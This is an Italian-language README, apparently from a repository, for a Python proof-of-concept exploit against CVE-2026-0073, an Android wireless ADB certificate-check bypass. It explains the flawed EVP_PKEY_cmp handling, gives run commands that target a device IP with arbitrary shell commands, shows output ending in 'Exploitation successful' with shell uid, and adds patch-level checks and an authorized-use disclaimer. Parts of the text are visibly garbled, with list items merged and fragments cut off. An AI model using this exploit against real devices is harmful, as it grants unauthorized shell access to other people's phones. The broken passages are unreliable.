
CVE-2026-0073 - Bypass dell'autenticazione reciproca wireless ADB PoC
Questa directory contiene una prova di concetto in Python per CVE-2026-0073.
Lo script è generato utilizzando tecniche di generazione di codice assistite da AI.
CVE-2026-0073 è un problema logico nella verifica dei certificati del demone ADB (adbd_tls_verify_cert in auth.cpp).
Il controllo vulnerabile considera qualsiasi valore di ritorno non zero da EVP_PKEY_cmp(...) come una corrispondenza riuscita.
La gestione prevista del risultato del confronto dovrebbe essere:
1 = chiavi corrispondono0 = chiavi non corrispondonoNelle build vulnerabili, i valori negativi sono considerati veri e possono contrassegnare erroneamente un certificato come autorizzato.
poc-cve-2026-0073.pyLo script:
ec o ed25519).shell: con fallback exec:).cryptographyInstalla le dipendenze:
pip install cryptography
Scopri il servizio ADB target (se necessario):
adb mdns services
Esegui il PoC:
python3 poc-cve-2026-0073.py <target_ip> [port] [command] [key_type] [--verbose]
Argomenti:
target_ip: Indirizzo IP del dispositivo Android targetport: Porta ADB (default: 5555)command: Comando da eseguire (default: id)key_type: ec o ed25519 (default: ec)--verbose: Abilita i log di debug del protocolloEsempi:
python3 poc-cve-2026-0073.py 192.168.1.100 5555 id
python3 poc-cve-2026-0073.py 192.168.1.100 5555 whoami ec --verbose
python3 poc-cve-2026-0073.py 192.168.1.100 5555 getprop ed25519
[*] Opening service: 'shell:id'
[*] After OPEN, received: OKAY arg0=2 data=b''
[+] Stream open (local_id=1, remote_id=2)
[+] Command output:
----------------------------------------
uid=2000(shell) gid=2000(shell) ...
----------------------------------------
[+] Exploitation successful.
Connection refused
certificate_unknown
Timeout in attesa di risposte
--verbose per tracce a livello di pacchetto.Il livello di patch di sicurezza del sistema operativo di base e la patch del modulo Mainline possono differire. Un dispositivo può mostrare un SPL mensile più vecchio mentre riceve correzioni più recenti del modulo ADB.
Controlli utili:
adb shell getprop ro.build.version.security_patch
adb shell pm list packages --apex-only | grep adbd
adb shell dumpsys package com.google.android.adbd | grep -E "versionCode|versionName|lastUpdateTime"
Usa questo PoC solo in ambienti autorizzati (dispositivi di laboratorio di proprietà, permesso esplicito o test autorizzati). Non eseguire questo contro sistemi che non possiedi o per i quali non hai autorizzazione scritta per testare.
daemon/auth.cpp)